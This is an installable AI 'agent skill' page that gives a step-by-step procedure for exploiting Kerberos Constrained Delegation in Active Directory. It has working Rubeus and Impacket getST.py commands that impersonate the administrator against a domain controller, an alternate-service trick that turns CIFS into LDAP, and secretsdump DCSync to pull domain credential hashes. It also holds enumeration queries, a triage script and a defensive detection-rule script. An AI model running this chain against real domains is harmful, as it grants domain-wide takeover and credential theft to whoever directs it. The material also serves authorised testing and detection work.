Agent skill

exploiting-constrained-delegation-abuse

Exploit Kerberos Constrained Delegation misconfigurations in Active Directory to impersonate privileged users via S4U2self and S4U2proxy extensions for lateral movement and privilege escalation.

Install this agent skill to your Project

npx add-skill https://github.com/autohandai/community-skills/tree/main/exploiting-constrained-delegation-abuse

SKILL.md

Exploiting Constrained Delegation Abuse

Overview

Kerberos Constrained Delegation (KCD) is an Active Directory feature that lets a service obtain tickets to a fixed list of other services on behalf of a user who authenticated to it. The permitted targets are SPNs stored in the msDS-AllowedToDelegateTo attribute of the delegating account. Two Kerberos protocol extensions implement it: S4U2self lets the service ask the KDC for a ticket to itself in the name of an arbitrary user, and S4U2proxy lets it exchange a forwardable ticket for that user for a ticket to one of the listed targets. The KDC only makes the S4U2self ticket forwardable when the account also carries the TRUSTED_TO_AUTH_FOR_DELEGATION flag (protocol transition); without it the service needs a forwardable ticket the user supplied by authenticating to it. An attacker who obtains the credentials of a delegating account with protocol transition can therefore request service tickets as any user that is not protected from delegation (members of Protected Users and accounts flagged "Account is sensitive and cannot be delegated" are excluded) for every listed SPN and, because the service name in a ticket is not integrity-protected, for any other SPN keyed by the same account. When the target is a Domain Controller service such as CIFS or LDAP, that is equivalent to Domain Admin access: file system access on the DC, DCSync, or arbitrary directory changes.

Objectives

  • Enumerate accounts with Constrained Delegation configured in the domain
  • Identify delegation targets (msDS-AllowedToDelegateTo) for high-value services
  • Exploit S4U2self and S4U2proxy to impersonate Domain Admin
  • Obtain service tickets for delegated services as a privileged user
  • Access delegated services (CIFS, LDAP, HTTP) on target hosts
  • Escalate to Domain Admin through Constrained Delegation abuse

MITRE ATT&CK Mapping

  • T1558 - Steal or Forge Kerberos Tickets (S4U2self/S4U2proxy abuse has no dedicated sub-technique; T1558.003 Kerberoasting applies only when the delegating service account's hash was obtained that way)
  • T1550.003 - Use Alternate Authentication Material: Pass the Ticket
  • T1134.001 - Access Token Manipulation: Token Impersonation/Theft
  • T1078.002 - Valid Accounts: Domain Accounts
  • T1021 - Remote Services

Implementation Steps

Phase 1: Enumerate Constrained Delegation

  1. Find accounts with Constrained Delegation using PowerView. The -TrustedToAuth switch only matches accounts that also carry TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition); to list every account with delegation targets, filter on the attribute itself:
    powershell
    # All users and computers with msDS-AllowedToDelegateTo set, with or without protocol transition
    Get-DomainUser -LDAPFilter '(msDS-AllowedToDelegateTo=*)' | Select-Object samaccountname, msds-allowedtodelegateto, useraccountcontrol
    Get-DomainComputer -LDAPFilter '(msDS-AllowedToDelegateTo=*)' | Select-Object samaccountname, msds-allowedtodelegateto, useraccountcontrol
    
    # Only accounts that also allow protocol transition
    Get-DomainUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto
    Get-DomainComputer -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto
    
    # Using the ActiveDirectory module
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' -Properties msDS-AllowedToDelegateTo, userAccountControl
    
  2. Using Impacket findDelegation.py, which lists unconstrained, constrained, constrained-with-protocol-transition and resource-based delegation in one table:
    bash
    findDelegation.py domain.local/user:'Password123' -dc-ip 10.10.10.1
    
  3. Using BloodHound CE, either through the node property or the AllowedToDelegate edge:
    cypher
    MATCH (c) WHERE c.allowedtodelegate IS NOT NULL
    RETURN c.name, c.allowedtodelegate, c.trustedtoauth
    
    MATCH p=(a)-[:AllowedToDelegate]->(b) RETURN p
    
  4. Check for the TRUSTED_TO_AUTH_FOR_DELEGATION flag (protocol transition). Without it the chain in Phases 2 and 3 needs a forwardable ticket from the victim, so record this per account:
    powershell
    # userAccountControl bit 0x1000000 (16777216) = TRUSTED_TO_AUTH_FOR_DELEGATION
    Get-DomainUser -LDAPFilter '(msDS-AllowedToDelegateTo=*)' |
      Select-Object samaccountname, @{n='ProtocolTransition'; e={ [bool]($_.useraccountcontrol -band 0x1000000) }}
    

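Worked example (added here; not part of the original skill and not PowerView or Impacket code): a Python triage of the attributes the queries above return. Given samAccountName, userAccountControl and msDS-AllowedToDelegateTo per account, plus a map of which account owns each SPN and the set of domain controller hosts, it classifies the delegation type, reports whether protocol transition is present, whether a delegated SPN lands on a DC, and which other SPNs are reachable by alternate-service substitution (only those keyed by the same account). The account records, the SPN ownership map and the DC list are constructed sample data; in an engagement they come from the servicePrincipalName attribute of every account and the Domain Controllers OU.

```python
"""Triage of constrained-delegation enumeration output (added example, constructed data)."""
from dataclasses import dataclass, field

# userAccountControl bits (MS-ADTS 2.2.16)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition


@dataclass
class Account:
    sam: str
    uac: int
    allowed_to_delegate_to: list = field(default_factory=list)   # msDS-AllowedToDelegateTo values


def parse_spn(spn):
    """'MSSQLSvc/sql01.domain.local:1433' -> ('MSSQLSVC', 'SQL01.DOMAIN.LOCAL')."""
    service, _, rest = spn.partition("/")
    host = rest.split("/")[0].split(":")[0]
    return service.upper(), host.upper()


def delegation_kind(acct):
    if acct.uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if acct.allowed_to_delegate_to:
        if acct.uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained+protocol-transition"
        return "constrained"
    return "none"


def victim_blocked(victim_uac, in_protected_users):
    """True when S4U2self for this victim yields a non-forwardable ticket, which makes
    the S4U2proxy step fail whatever flags the delegating account carries."""
    return bool(victim_uac & NOT_DELEGATED) or in_protected_users


def triage(acct, spn_owner, dc_hosts):
    kind = delegation_kind(acct)
    targets = []
    for spn in acct.allowed_to_delegate_to:
        _, host = parse_spn(spn)
        owner = spn_owner.get(spn.upper())
        # Alternate-service substitution only reaches SPNs keyed by the same account.
        alternates = sorted(s for s, o in spn_owner.items()
                            if owner is not None and o == owner and s != spn.upper())
        targets.append({"spn": spn, "host": host, "on_dc": host in dc_hosts,
                        "owner": owner, "alternates": alternates})
    next_step = {
        "constrained+protocol-transition":
            "S4U2self+S4U2proxy as any non-protected user (Rubeus s4u / getST.py -impersonate)",
        "constrained": "needs a forwardable TGS from the victim, or an RBCD hop on the target",
        "unconstrained": "capture inbound TGTs on the host instead",
        "none": "nothing to do",
    }[kind]
    return {"account": acct.sam, "delegation": kind,
            "protocol_transition": kind == "constrained+protocol-transition",
            "targets": targets, "next_step": next_step}


def report(accounts, spn_owner, dc_hosts):
    return [triage(a, spn_owner, dc_hosts) for a in accounts]


# --- constructed sample data: uppercased SPN -> owning account, DC hosts, enumerated accounts ---
SPN_OWNER = {
    "CIFS/DC01.DOMAIN.LOCAL": "DC01$",
    "LDAP/DC01.DOMAIN.LOCAL": "DC01$",
    "HOST/DC01.DOMAIN.LOCAL": "DC01$",
    "CIFS/SQL01.DOMAIN.LOCAL": "SQL01$",
    "MSSQLSVC/SQL01.DOMAIN.LOCAL:1433": "svc_sql",
}
DC_HOSTS = {"DC01.DOMAIN.LOCAL"}
ACCOUNTS = [
    # 0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD; 0x1000 = WORKSTATION_TRUST_ACCOUNT
    Account("svc_sql", 0x10200 | TRUSTED_TO_AUTH_FOR_DELEGATION, ["CIFS/DC01.domain.local"]),
    Account("svc_web", 0x10200, ["MSSQLSvc/sql01.domain.local:1433"]),
    Account("WEB01$", 0x1000 | TRUSTED_FOR_DELEGATION),
]

if __name__ == "__main__":
    for row in report(ACCOUNTS, SPN_OWNER, DC_HOSTS):
        print(row["account"], row["delegation"], "->", row["next_step"])
        for t in row["targets"]:
            print("    %s on_dc=%s owner=%s alternates=%s"
                  % (t["spn"], t["on_dc"], t["owner"], t["alternates"]))
```

The next_step field says which of Phases 2 to 5 applies to each account, and victim_blocked() is the check to run on the user you intend to impersonate before spending time on the chain. In the sample data svc_web can only reach MSSQLSvc on SQL01: that SPN is registered on svc_sql, so CIFS/SQL01 (keyed with SQL01$) is not a substitution target.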
Phase 2: Exploit with Rubeus (Windows)

  1. If you have the password or hash of the constrained delegation account. Rubeus runs from cmd.exe or PowerShell, where a trailing backslash is not a line continuation, so each command below is a single line. Prefer the AES256 key where the account has one: a TGT requested with /rc4 appears in Event 4768 with encryption type 0x17, which stands out in a domain where everything else negotiates AES.
    powershell
    # Request a TGT for the constrained delegation account (/nowrap keeps the base64 blob on one line)
    Rubeus.exe asktgt /user:svc_sql /domain:domain.local /rc4:<ntlm_hash> /nowrap
    Rubeus.exe asktgt /user:svc_sql /domain:domain.local /aes256:<aes256_key> /nowrap
    
    # S4U2self + S4U2proxy to impersonate administrator against the delegated SPN, injected into the current logon session
    Rubeus.exe s4u /ticket:<base64_tgt> /impersonateuser:administrator /msdsspn:CIFS/DC01.domain.local /ptt
    
    # Alternate service name: substitute another SPN on the same host account (one name or a comma-separated list)
    Rubeus.exe s4u /ticket:<base64_tgt> /impersonateuser:administrator /msdsspn:CIFS/DC01.domain.local /altservice:LDAP /ptt
    
  2. Combined TGT request and S4U in a single command:
    powershell
    Rubeus.exe s4u /user:svc_sql /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:CIFS/DC01.domain.local /domain:domain.local /ptt
    
  3. Confirm the injected ticket before using it: klist should list a ticket with client administrator @ DOMAIN.LOCAL for server cifs/DC01.domain.local, and dir \\DC01.domain.local\C$ should then succeed. If the S4U2proxy step fails with KDC_ERR_BADOPTION, the S4U2self ticket was not forwardable: either the account lacks protocol transition or the impersonated user is protected from delegation (see Phase 5).

Phase 3: Exploit with Impacket (Linux)

  1. Request the service ticket via the S4U protocol extensions. With -impersonate, getST.py performs S4U2self and then S4U2proxy in one run; the DC must be reachable (-dc-ip) and the clock skew against it must stay under five minutes, otherwise the KDC answers KRB_AP_ERR_SKEW:
    bash
    # S4U2self + S4U2proxy with the service account's password
    getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
      -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'
    
    # Same, authenticating with the NT hash (LM half left empty)
    getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
      -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 \
      -dc-ip 10.10.10.1 domain.local/svc_sql
    
    # Use the obtained ticket. The ccache file name depends on the Impacket version
    # (older releases write administrator.ccache, newer ones add the SPN and realm), so take the path getST.py prints
    export KRB5CCNAME=administrator.ccache
    smbclient.py -k -no-pass domain.local/administrator@DC01.domain.local
    
  2. Address the target by the FQDN used in the SPN (DC01.domain.local, not an IP address or short name): the ticket in the ccache is selected by that name and is not used when it does not match.
    

Phase 4: Alternate Service Name Abuse

  1. The service name (sname) is carried in the cleartext part of a service ticket, while the part the service verifies, the enc-part, is encrypted under the long-term key of the account that owns the SPN. Every SPN registered on the same account is keyed identically, so a ticket issued for CIFS/DC01 can be relabelled LDAP/DC01 (both owned by DC01$) and is accepted unchanged:
    bash
    # Request the CIFS ticket the delegation allows, then have it relabelled for LDAP (DCSync)
    getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
      -altservice LDAP/DC01.domain.local \
      -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'
    
    export KRB5CCNAME=administrator.ccache   # use the file name getST.py prints
    secretsdump.py -k -no-pass domain.local/administrator@DC01.domain.local
    
  2. This works because the sname field is outside the encrypted part of the ticket and is therefore not integrity-protected; the session key and the client identity inside enc-part stay valid whatever sname says. The limit is the key: substitution only reaches SPNs that belong to the same account as the delegated SPN. If msDS-AllowedToDelegateTo points at MSSQLSvc/sql01.domain.local:1433 and that SPN is registered on a service account rather than on SQL01$, then CIFS/sql01.domain.local (keyed with the computer account) is out of reach.
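To make the mechanism concrete, an added example (not code from the original skill; it uses a toy HMAC-SHA256 sealing routine in place of the real Kerberos encryption types and a dict in place of ASN.1) models a service ticket as the KDC issues it, rewrites its sname the way -altservice and /altservice do, and shows which receiving services still accept it. The layout is the one that matters from RFC 4120 section 5.3: sname in the cleartext Ticket, only enc-part protected under the SPN owner's key. Account keys, SPN ownership and host names are constructed.

```python
"""Model of a service ticket and the alternate-service rewrite (added example, toy crypto)."""
import hashlib
import hmac
import json
import os


def _keystream(key, nonce, length):
    out, ctr = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:length]


def seal(key, plaintext):
    """Toy authenticated encryption standing in for AES-CTS-HMAC: nonce || ciphertext || tag."""
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        return None                  # wrong key: this service cannot decrypt the ticket
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


# Constructed: one long-term key per account, and which account owns which SPN
ACCOUNT_KEYS = {"DC01$": os.urandom(32), "SQL01$": os.urandom(32)}
SPN_OWNER = {
    "CIFS/DC01.domain.local": "DC01$",
    "LDAP/DC01.domain.local": "DC01$",
    "CIFS/SQL01.domain.local": "SQL01$",
}


def kdc_issue(spn, cname, session_key):
    """What the KDC does on S4U2proxy: resolve the SPN's owner, seal enc-part under that owner's key.
    sname is written into the cleartext part and is not covered by the seal."""
    enc_part = {"cname": cname, "key": session_key.hex(), "flags": ["forwardable"]}
    blob = seal(ACCOUNT_KEYS[SPN_OWNER[spn]], json.dumps(enc_part).encode())
    return {"tkt-vno": 5, "realm": "DOMAIN.LOCAL", "sname": spn, "enc-part": blob}


def substitute_service(ticket, new_spn):
    """The altservice trick: rewrite the unprotected sname and leave enc-part untouched."""
    return {**ticket, "sname": new_spn}


def service_accepts(ticket, my_account):
    """A receiving service proves the ticket only by decrypting enc-part with its own key.
    Returns the authenticated client name, or None when the key does not fit."""
    plain = unseal(ACCOUNT_KEYS[my_account], ticket["enc-part"])
    return json.loads(plain)["cname"] if plain is not None else None


if __name__ == "__main__":
    t = kdc_issue("CIFS/DC01.domain.local", "administrator", os.urandom(16))
    print("CIFS on DC01 sees:", service_accepts(t, "DC01$"))
    ldap = substitute_service(t, "LDAP/DC01.domain.local")
    print("LDAP on DC01 sees:", service_accepts(ldap, "DC01$"))           # same key, still valid
    other = substitute_service(t, "CIFS/SQL01.domain.local")
    print("CIFS on SQL01 sees:", service_accepts(other, "SQL01$"))        # different key, rejected
```

The third call is the caveat from step 2: relabelling to an SPN on a different account produces a ticket nobody can decrypt, so the reach of the substitution is exactly the set of SPNs sharing the delegated SPN's owner.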

Phase 5: Protocol Transition Attack

  1. If the account has TRUSTED_TO_AUTH_FOR_DELEGATION, the KDC returns a forwardable ticket from S4U2self for any user without that user ever authenticating, so the S4U2proxy step needs nothing beyond the service account's own credentials:
    bash
    # S4U2self obtains a forwardable ticket on behalf of administrator without administrator's password;
    # S4U2proxy then exchanges it for a ticket to the delegated SPN
    getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
      -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'
    
  2. Without TRUSTED_TO_AUTH_FOR_DELEGATION, the S4U2self ticket comes back non-forwardable and the KDC rejects the S4U2proxy request (getST.py reports KDC_ERR_BADOPTION). You then need a forwardable service ticket for the victim obtained another way, for example by getting the victim to authenticate to the compromised service with Kerberos, or you chain through Resource-Based Constrained Delegation, where the KDC accepts a non-forwardable S4U2self ticket as the evidence ticket.
  3. Two classes of victims cannot be impersonated whatever the delegating account's flags: members of Protected Users and accounts marked "Account is sensitive and cannot be delegated" (NOT_DELEGATED, userAccountControl 0x100000). For them S4U2self also returns a non-forwardable ticket, so check the intended target for both before running the chain and pick another privileged account if either applies.

Tools and Resources

| Tool | Purpose | Platform |
|---|---|---|
| Rubeus | S4U Kerberos ticket manipulation | Windows (.NET) |
| getST.py | S4U service ticket requests (Impacket) | Linux (Python) |
| findDelegation.py | Delegation enumeration (Impacket) | Linux (Python) |
| PowerView | AD delegation enumeration | Windows (PowerShell) |
| BloodHound CE | Visual delegation path analysis | Docker |
| Kekeo | Advanced Kerberos toolkit | Windows |

Delegation Types Comparison

| Type | Attribute | Scope | Attack Complexity |
|---|---|---|---|
| Unconstrained | userAccountControl TRUSTED_FOR_DELEGATION (0x80000) | Any service | Low (capture TGTs from inbound authentication) |
| Constrained | msDS-AllowedToDelegateTo | Listed SPNs, plus other SPNs keyed by the same account | Higher (needs a forwardable ticket from the victim, or an RBCD hop) |
| Constrained + Protocol Transition | msDS-AllowedToDelegateTo + TRUSTED_TO_AUTH_FOR_DELEGATION (0x1000000) | Listed SPNs, plus other SPNs keyed by the same account | Medium (no user authentication needed) |
| Resource-Based (RBCD) | msDS-AllowedToActOnBehalfOfOtherIdentity on the target | The target resource | Medium (write access to that attribute) |

Detection Signatures

| Indicator | Detection Method |
|---|---|
| S4U2self ticket requests | Event 4769 where Account Name is the impersonated user and Service Name is the delegating service account itself (the account requests a ticket to its own SPN in someone else's name); low fidelity on its own, correlate with the S4U2proxy event that follows |
| S4U2proxy forwarded tickets | Event 4769 with the Transited Services field populated (the delegating account) and the constrained-delegation bit (cname-in-addl-tkt, 0x20000) set in Ticket Options; escalate when the impersonated account is privileged or the target is a DC |
| RC4 tickets driven by an NT hash | Events 4768/4769 with Ticket Encryption Type 0x17 for an account that otherwise uses AES (Rubeus /rc4, getST.py -hashes) |
| Alternate service name in ticket | A 4769 for one SPN followed by access to a different service on the same host; correlate 4769 with 4624 logons and the target service's own logs |
| Rubeus.exe execution | EDR process detection, command-line logging (Sysmon Event 1, 4688) |
| Delegation configuration changes | Event 5136 for msDS-AllowedToDelegateTo modifications (needs Directory Service Changes auditing and a SACL on the object); Events 4738/4742 carry the AllowedToDelegateTo and UserAccountControl fields |
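The rules in the table, as an added example (not a vendor rule and not code from the original skill), run over constructed Security events: S4U2proxy via the Transited Services field and the cname-in-addl-tkt option bit, S4U2self candidates via a delegating account requesting a ticket to itself for another principal, RC4 service tickets, and delegation changes via 5136 and 4738/4742. Field names follow the EventData of the Windows Security log; the six sample records are constructed, and the sets of delegating accounts, privileged accounts and DC computer accounts are assumed to come from the Phase 1 enumeration.

```python
"""Detection rules for S4U abuse over Security events (added example, constructed events)."""

CNAME_IN_ADDL_TKT = 0x00020000   # KDC option bit 14: the constrained-delegation (S4U2proxy) request
RC4_HMAC = "0x17"                # TicketEncryptionType of an RC4 ticket


def _severity(evt, privileged, dc_accounts):
    victim = evt.get("TargetUserName", "").split("@")[0].lower()
    target = evt.get("ServiceName", "").lower()
    return "high" if victim in privileged or target in dc_accounts else "medium"


def analyze(events, delegating_accounts, privileged, dc_accounts):
    """Return alerts as dicts with rule, severity, index (position in events) and detail."""
    privileged = {p.lower() for p in privileged}
    dc_accounts = {d.lower() for d in dc_accounts}
    delegating_accounts = {d.lower() for d in delegating_accounts}
    alerts = []
    for i, evt in enumerate(events):
        eid = evt["EventID"]
        if eid == 4769:
            transited = evt.get("TransitedServices", "-")
            options = int(evt.get("TicketOptions", "0x0"), 16)
            service = evt.get("ServiceName", "").lower()
            victim = evt.get("TargetUserName", "")
            if transited not in ("", "-"):
                # S4U2proxy: the KDC records the delegating service in Transited Services
                detail = "%s obtained a ticket for %s as %s" % (transited, evt["ServiceName"], victim)
                if options & CNAME_IN_ADDL_TKT:
                    detail += " (cname-in-addl-tkt set)"
                alerts.append({"rule": "s4u2proxy", "severity": _severity(evt, privileged, dc_accounts),
                               "index": i, "detail": detail})
            elif service in delegating_accounts and victim.split("@")[0].lower() != service:
                # S4U2self: a delegating account requests a ticket to itself in another user's name
                alerts.append({"rule": "s4u2self_candidate", "severity": _severity(evt, privileged, dc_accounts),
                               "index": i, "detail": "%s requested a ticket to itself as %s" % (service, victim)})
            if evt.get("TicketEncryptionType") == RC4_HMAC:
                # RC4 service ticket: typical of tooling driven with an NT hash
                alerts.append({"rule": "rc4_ticket", "severity": "low", "index": i,
                               "detail": "RC4 (0x17) ticket for %s to %s" % (victim, evt["ServiceName"])})
        elif eid == 5136 and evt.get("AttributeLDAPDisplayName", "").lower() == "msds-allowedtodelegateto":
            alerts.append({"rule": "delegation_attribute_changed", "severity": "high", "index": i,
                           "detail": "%s on %s: %s" % (evt["AttributeLDAPDisplayName"], evt["ObjectDN"], evt["AttributeValue"])})
        elif eid in (4738, 4742) and evt.get("AllowedToDelegateTo", "-") != "-":
            alerts.append({"rule": "delegation_account_changed", "severity": "high", "index": i,
                           "detail": "%s: AllowedToDelegateTo=%s" % (evt["TargetUserName"], evt["AllowedToDelegateTo"])})
    return alerts


# --- constructed sample events, field names as in the Security log EventData ---
SAMPLE_EVENTS = [
    # 0: S4U2self by svc_sql for administrator, requested off an RC4 TGT
    {"EventID": 4769, "TargetUserName": "administrator@DOMAIN.LOCAL", "ServiceName": "svc_sql",
     "TicketOptions": "0x40810000", "TransitedServices": "-", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50"},
    # 1: S4U2proxy: svc_sql exchanges it for a ticket to DC01$ (CIFS/DC01) as administrator
    {"EventID": 4769, "TargetUserName": "administrator@DOMAIN.LOCAL", "ServiceName": "DC01$",
     "TicketOptions": "0x40820010", "TransitedServices": "svc_sql@DOMAIN.LOCAL", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50"},
    # 2: ordinary user ticket, no alert expected
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "FS01$",
     "TicketOptions": "0x40810000", "TransitedServices": "-", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.20.7"},
    # 3: a DC SPN added to svc_web's msDS-AllowedToDelegateTo (Directory Service Changes auditing)
    {"EventID": 5136, "ObjectDN": "CN=svc_web,OU=Service Accounts,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToDelegateTo", "AttributeValue": "LDAP/DC01.domain.local", "OperationType": "%%14674"},
    # 4: the same change as seen through user-account-changed auditing
    {"EventID": 4738, "TargetUserName": "svc_web", "AllowedToDelegateTo": "LDAP/DC01.domain.local", "UserAccountControl": "-"},
    # 5: a legitimate constrained-delegation hop by a web front end for a normal user
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "SQL01$",
     "TicketOptions": "0x40820010", "TransitedServices": "svc_web@DOMAIN.LOCAL", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.20.9"},
]
DELEGATING_ACCOUNTS = {"svc_sql", "svc_web"}   # from Phase 1 enumeration
PRIVILEGED = {"administrator", "krbtgt"}
DC_ACCOUNTS = {"DC01$"}

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS, DELEGATING_ACCOUNTS, PRIVILEGED, DC_ACCOUNTS):
        print(a["severity"].upper(), a["rule"], "#%d" % a["index"], a["detail"])
```

Record 5 shows why the S4U2proxy rule needs the severity split: constrained delegation fires Transited Services on every legitimate hop, so the alert is only worth paging on when the impersonated account is privileged or the target is a domain controller; the rest is baseline material for the delegating accounts you already know about.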

Validation Criteria

  • Accounts with Constrained Delegation enumerated
  • Delegation targets (msDS-AllowedToDelegateTo) identified
  • S4U2self ticket obtained for target user
  • S4U2proxy ticket forwarded to delegation target
  • Privileged access to delegated service validated
  • Alternate service name substitution tested
  • Protocol transition capability assessed
  • Evidence documented with ticket exports and access proof
